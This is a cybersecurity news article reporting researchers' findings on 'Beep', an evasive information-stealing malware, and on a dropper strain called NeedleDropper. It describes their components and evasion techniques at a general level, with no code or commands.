Share news article

Share on facebook
Share on twitter
Share on linkedin
Share on email

Experts Warn of 'Beep' – A New Evasive Malware That Can Fly Under the Radar

Feb 15, 2023Ravie LakshmananThreat Detection / Malware

Cybersecurity researchers have unearthed a new piece of evasive malware dubbed Beep that’s designed to fly under the radar and drop additional payloads onto a compromised host.

“It seemed as if the authors of this malware were trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find,” Minerva Labs researcher Natalie Zargarov said.

“One such technique involved delaying execution through the use of the Beep API function, hence the malware’s name.”

Beep comprises three components, the first of which is a dropper that’s responsible for creating a new Windows Registry key and executing a Base64-encoded PowerShell script stored in it.

The PowerShell script, for its part, reaches out to a remote server to retrieve an injector, which, after confirming it’s not being debugged or launched in a virtual machine, extracts and launches the payload via a technique called process hollowing.

The payload is an information stealer that’s equipped to collect and exfiltrate system information and enumerate running processes. Other instructions the malware is capable of accepting from a command-and-control (C2) server include the ability to execute DLL and EXE files.

A number of other features are yet to be implemented, suggesting that Beep is still in its early stages of development.

What sets the emerging malware apart is its heavy focus on stealth, adopting a sheer number of detection evasion methods in an attempt to resist analysis, avoid sandboxes, and delay execution.

“Once this malware successfully penetrates a system, it can easily download and spread a wide range of additional malicious tools, including ransomware, making it extremely dangerous,” Zargarov noted.

The findings come as antivirus vendor Avast revealed details of another dropper strain codenamed NeedleDropper that has been used to distribute different malware families since October 2022.

Delivered via spam email attachments, Discord, or OneDrive URLs, the malware is suspected to be offered as a service for other criminal actors looking to distribute their own payloads.

“The malware tries to hide itself by dropping many unused, invalid files and stores important data between several MB of unimportant data, and also utilizes legitimate applications to perform its execution,” the company said.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.

Related News

New Backdoor Attack Uses Russian-Ukrainian Conflict Phishing Emails

New Backdoor Attack Uses Russian-Ukrainian Conflict Phishing Emails

The primary targets of this phishing campaign are located in the Ukrainian regions of Crimea, Donetsk, and Lugansk, which were…
CyberSecure Announces Strategic Alliance

CyberSecure Announces Strategic Alliance

BETHESDA, Md., March 24, 2023 /PRNewswire/ — Cybersecure IPS and LockDown Inc. jointly announce that they have entered a strategic alliance to…
Tesla Model 3 Hacked in Less Than 2 Minutes at Pwn2Own Contest

Tesla Model 3 Hacked in Less Than 2 Minutes at Pwn2Own Contest

Researchers from France-based pen-testing firm Synacktiv demonstrated two separate exploits against the Tesla Model 3 this week at the Pwn2Own…